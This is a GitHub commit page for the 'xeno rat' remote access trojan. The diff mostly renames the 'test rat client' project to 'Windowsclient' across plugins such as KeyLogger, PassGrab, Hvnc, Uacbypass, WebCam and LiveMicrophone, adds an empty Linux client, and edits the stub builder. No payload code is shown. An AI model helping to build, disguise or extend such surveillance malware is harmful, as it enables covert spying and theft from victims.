Skip to content

Commit

Permalink
Random updates
Browse files Browse the repository at this point in the history
  • Loading branch information
Vasco0x4 committed Jan 3, 2025
1 parent 447b4bf commit c5d34c7
Show file tree
Hide file tree
Showing 27 changed files with 62 additions and 42 deletions.
13 changes: 13 additions & 0 deletions LinuxClient/LinuxClient.csproj
Original file line number Diff line number Diff line change
@@ -0,0 +1,13 @@
<Project Sdk="Microsoft.NET.Sdk">

<PropertyGroup>
<OutputType>Exe</OutputType>
<TargetFramework>net6.0</TargetFramework>
<ImplicitUsings>enable</ImplicitUsings>
<Nullable>enable</Nullable>
<RuntimeIdentifier>linux-x64</RuntimeIdentifier>
<PublishSingleFile>true</PublishSingleFile>
<SelfContained>true</SelfContained>
</PropertyGroup>

</Project>
1 change: 1 addition & 0 deletions LinuxClient/Network/Authentication.cs
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@

1 change: 1 addition & 0 deletions LinuxClient/Network/NetworkManager.cs
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@

1 change: 1 addition & 0 deletions LinuxClient/Program.cs
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@

1 change: 1 addition & 0 deletions LinuxClient/Utils/Ecryption.cs
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@

4 changes: 2 additions & 2 deletions Plugins/Chat/Chat.csproj
Original file line number Diff line number Diff line change
Expand Up @@ -59,9 +59,9 @@
</EmbeddedResource>
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\..\xeno rat client\test rat client.csproj">
<ProjectReference Include="..\..\xeno rat client\Windowsclient.csproj">
<Project>{310fc5be-6f5e-479c-a246-6093a39296c0}</Project>
<Name>test rat client</Name>
<Name>Windowsclient</Name>
</ProjectReference>
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
Expand Down
4 changes: 2 additions & 2 deletions Plugins/File manager/File manager.csproj
Original file line number Diff line number Diff line change
Expand Up @@ -46,9 +46,9 @@
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\..\xeno rat client\test rat client.csproj">
<ProjectReference Include="..\..\xeno rat client\Windowsclient.csproj">
<Project>{310fc5be-6f5e-479c-a246-6093a39296c0}</Project>
<Name>test rat client</Name>
<Name>Windowsclient</Name>
</ProjectReference>
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
Expand Down
4 changes: 2 additions & 2 deletions Plugins/Fun/Fun.csproj
Original file line number Diff line number Diff line change
Expand Up @@ -46,9 +46,9 @@
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\..\xeno rat client\test rat client.csproj">
<ProjectReference Include="..\..\xeno rat client\Windowsclient.csproj">
<Project>{310fc5be-6f5e-479c-a246-6093a39296c0}</Project>
<Name>test rat client</Name>
<Name>Windowsclient</Name>
</ProjectReference>
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
Expand Down
4 changes: 2 additions & 2 deletions Plugins/Hvnc/Hvnc.csproj
Original file line number Diff line number Diff line change
Expand Up @@ -52,9 +52,9 @@
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\..\xeno rat client\test rat client.csproj">
<ProjectReference Include="..\..\xeno rat client\Windowsclient.csproj">
<Project>{310fc5be-6f5e-479c-a246-6093a39296c0}</Project>
<Name>test rat client</Name>
<Name>Windowsclient</Name>
</ProjectReference>
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
Expand Down
4 changes: 2 additions & 2 deletions Plugins/KeyLogger/KeyLogger.csproj
Original file line number Diff line number Diff line change
Expand Up @@ -46,9 +46,9 @@
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\..\xeno rat client\test rat client.csproj">
<ProjectReference Include="..\..\xeno rat client\Windowsclient.csproj">
<Project>{310fc5be-6f5e-479c-a246-6093a39296c0}</Project>
<Name>test rat client</Name>
<Name>Windowsclient</Name>
</ProjectReference>
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
Expand Down
4 changes: 2 additions & 2 deletions Plugins/KeyLoggerOffline/KeyLoggerOffline.csproj
Original file line number Diff line number Diff line change
Expand Up @@ -46,9 +46,9 @@
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\..\xeno rat client\test rat client.csproj">
<ProjectReference Include="..\..\xeno rat client\Windowsclient.csproj">
<Project>{310fc5be-6f5e-479c-a246-6093a39296c0}</Project>
<Name>test rat client</Name>
<Name>Windowsclient</Name>
</ProjectReference>
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
Expand Down
4 changes: 2 additions & 2 deletions Plugins/LiveMicrophone/LiveMicrophone.csproj
Original file line number Diff line number Diff line change
Expand Up @@ -494,9 +494,9 @@
<None Include="lib\NAudio.WinMM\NAudio.WinMM.csproj" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\..\xeno rat client\test rat client.csproj">
<ProjectReference Include="..\..\xeno rat client\Windowsclient.csproj">
<Project>{310fc5be-6f5e-479c-a246-6093a39296c0}</Project>
<Name>test rat client</Name>
<Name>Windowsclient</Name>
</ProjectReference>
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
Expand Down
4 changes: 2 additions & 2 deletions Plugins/PassGrab/InfoGrab.csproj
Original file line number Diff line number Diff line change
Expand Up @@ -42,9 +42,9 @@
<ItemGroup>
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\..\xeno rat client\test rat client.csproj">
<ProjectReference Include="..\..\xeno rat client\Windowsclient.csproj">
<Project>{310fc5be-6f5e-479c-a246-6093a39296c0}</Project>
<Name>test rat client</Name>
<Name>Windowsclient</Name>
</ProjectReference>
</ItemGroup>
<ItemGroup>
Expand Down
4 changes: 2 additions & 2 deletions Plugins/ProcessManager/ProcessManager.csproj
Original file line number Diff line number Diff line change
Expand Up @@ -47,9 +47,9 @@
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\..\xeno rat client\test rat client.csproj">
<ProjectReference Include="..\..\xeno rat client\Windowsclient.csproj">
<Project>{310fc5be-6f5e-479c-a246-6093a39296c0}</Project>
<Name>test rat client</Name>
<Name>Windowsclient</Name>
</ProjectReference>
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
Expand Down
4 changes: 2 additions & 2 deletions Plugins/Registry Manager/Registry Manager.csproj
Original file line number Diff line number Diff line change
Expand Up @@ -46,9 +46,9 @@
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\..\xeno rat client\test rat client.csproj">
<ProjectReference Include="..\..\xeno rat client\Windowsclient.csproj">
<Project>{310fc5be-6f5e-479c-a246-6093a39296c0}</Project>
<Name>test rat client</Name>
<Name>Windowsclient</Name>
</ProjectReference>
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
Expand Down
4 changes: 2 additions & 2 deletions Plugins/ReverseProxy/ReverseProxy.csproj
Original file line number Diff line number Diff line change
Expand Up @@ -46,9 +46,9 @@
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\..\xeno rat client\test rat client.csproj">
<ProjectReference Include="..\..\xeno rat client\Windowsclient.csproj">
<Project>{310fc5be-6f5e-479c-a246-6093a39296c0}</Project>
<Name>test rat client</Name>
<Name>Windowsclient</Name>
</ProjectReference>
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
Expand Down
4 changes: 2 additions & 2 deletions Plugins/ScreenControl/ScreenControl.csproj
Original file line number Diff line number Diff line change
Expand Up @@ -47,9 +47,9 @@
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\..\xeno rat client\test rat client.csproj">
<ProjectReference Include="..\..\xeno rat client\Windowsclient.csproj">
<Project>{310fc5be-6f5e-479c-a246-6093a39296c0}</Project>
<Name>test rat client</Name>
<Name>Windowsclient</Name>
</ProjectReference>
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
Expand Down
4 changes: 2 additions & 2 deletions Plugins/Shell/Shell.csproj
Original file line number Diff line number Diff line change
Expand Up @@ -46,9 +46,9 @@
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\..\xeno rat client\test rat client.csproj">
<ProjectReference Include="..\..\xeno rat client\Windowsclient.csproj">
<Project>{310fc5be-6f5e-479c-a246-6093a39296c0}</Project>
<Name>test rat client</Name>
<Name>Windowsclient</Name>
</ProjectReference>
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
Expand Down
4 changes: 2 additions & 2 deletions Plugins/Startup/Startup.csproj
Original file line number Diff line number Diff line change
Expand Up @@ -45,9 +45,9 @@
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\..\xeno rat client\test rat client.csproj">
<ProjectReference Include="..\..\xeno rat client\Windowsclient.csproj">
<Project>{310fc5be-6f5e-479c-a246-6093a39296c0}</Project>
<Name>test rat client</Name>
<Name>Windowsclient</Name>
</ProjectReference>
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
Expand Down
4 changes: 2 additions & 2 deletions Plugins/System/SystemPower.csproj
Original file line number Diff line number Diff line change
Expand Up @@ -45,9 +45,9 @@
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\..\xeno rat client\test rat client.csproj">
<ProjectReference Include="..\..\xeno rat client\Windowsclient.csproj">
<Project>{310fc5be-6f5e-479c-a246-6093a39296c0}</Project>
<Name>test rat client</Name>
<Name>Windowsclient</Name>
</ProjectReference>
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
Expand Down
4 changes: 2 additions & 2 deletions Plugins/Uacbypass/Uacbypass.csproj
Original file line number Diff line number Diff line change
Expand Up @@ -48,9 +48,9 @@
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\..\xeno rat client\test rat client.csproj">
<ProjectReference Include="..\..\xeno rat client\Windowsclient.csproj">
<Project>{310fc5be-6f5e-479c-a246-6093a39296c0}</Project>
<Name>test rat client</Name>
<Name>Windowsclient</Name>
</ProjectReference>
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
Expand Down
4 changes: 2 additions & 2 deletions Plugins/WebCam/WebCam.csproj
Original file line number Diff line number Diff line change
Expand Up @@ -81,9 +81,9 @@
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\..\xeno rat client\test rat client.csproj">
<ProjectReference Include="..\..\xeno rat client\Windowsclient.csproj">
<Project>{310fc5be-6f5e-479c-a246-6093a39296c0}</Project>
<Name>test rat client</Name>
<Name>Windowsclient</Name>
</ProjectReference>
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
Expand Down
File renamed without changes.
3 changes: 0 additions & 3 deletions xeno rat server/DvlErrLog.txt

This file was deleted.

6 changes: 3 additions & 3 deletions xeno rat server/MainForm.cs
Original file line number Diff line number Diff line change
Expand Up @@ -1611,7 +1611,7 @@ private void button2_Click(object sender, EventArgs e)
{
return;
}
AddLog("Building client...", Color.Blue);
//AddLog("Building client...", Color.Blue);
string filePath = saveFileDialog.FileName;
ModuleDefMD module = ModuleDefMD.Load("stub\\test rat client.exe");
SetsecurityKey(module, Utils.CalculateSha256Bytes(textBox14.Text));
Expand Down Expand Up @@ -1657,12 +1657,12 @@ private void button2_Click(object sender, EventArgs e)
{
IconInjector.InjectIcon(filePath, label16.Text);
}
AddLog("Client built!", Color.Green);
//AddLog("Client built!", Color.Green);
MessageBox.Show("File saved!");
}
catch (Exception ex)
{
AddLog("Client build failed!", Color.Red);
//AddLog("Client build failed!", Color.Red);
MessageBox.Show("An error has occurred: "+ex.Message);
}
}
Expand Down
File renamed without changes.
10 changes: 8 additions & 2 deletions xeno rat server/test rat server.sln
Original file line number Diff line number Diff line change
Expand Up @@ -3,9 +3,9 @@ Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 17
VisualStudioVersion = 17.11.35327.3
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "test rat server", "test rat server.csproj", "{06B2B14A-CE87-41C0-A77A-2644FE3231C7}"
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Server", "Server.csproj", "{06B2B14A-CE87-41C0-A77A-2644FE3231C7}"
EndProject
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "test rat client", "..\xeno rat client\test rat client.csproj", "{310FC5BE-6F5E-479C-A246-6093A39296C0}"
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Windowsclient", "..\xeno rat client\Windowsclient.csproj", "{310FC5BE-6F5E-479C-A246-6093A39296C0}"
EndProject
Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Plugins", "Plugins", "{BECCEDD2-03F5-40E6-8157-81B538B34AC6}"
EndProject
Expand Down Expand Up @@ -48,6 +48,8 @@ Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Solution Items", "Solution
.editorconfig = .editorconfig
EndProjectSection
EndProject
Project("{9A19103F-16F7-4668-BE54-9A1E7A4F7556}") = "LinuxClient", "..\LinuxClient\LinuxClient.csproj", "{595428BA-61E4-4BBD-B3C8-BD9CEAFAEC63}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Expand Down Expand Up @@ -130,6 +132,10 @@ Global
{4F169EA5-8854-4258-9D2C-D44F37D88776}.Debug|Any CPU.Build.0 = Debug|Any CPU
{4F169EA5-8854-4258-9D2C-D44F37D88776}.Release|Any CPU.ActiveCfg = Release|Any CPU
{4F169EA5-8854-4258-9D2C-D44F37D88776}.Release|Any CPU.Build.0 = Release|Any CPU
{595428BA-61E4-4BBD-B3C8-BD9CEAFAEC63}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{595428BA-61E4-4BBD-B3C8-BD9CEAFAEC63}.Debug|Any CPU.Build.0 = Debug|Any CPU
{595428BA-61E4-4BBD-B3C8-BD9CEAFAEC63}.Release|Any CPU.ActiveCfg = Release|Any CPU
{595428BA-61E4-4BBD-B3C8-BD9CEAFAEC63}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
Expand Down

0 comments on commit c5d34c7

Please sign in to comment.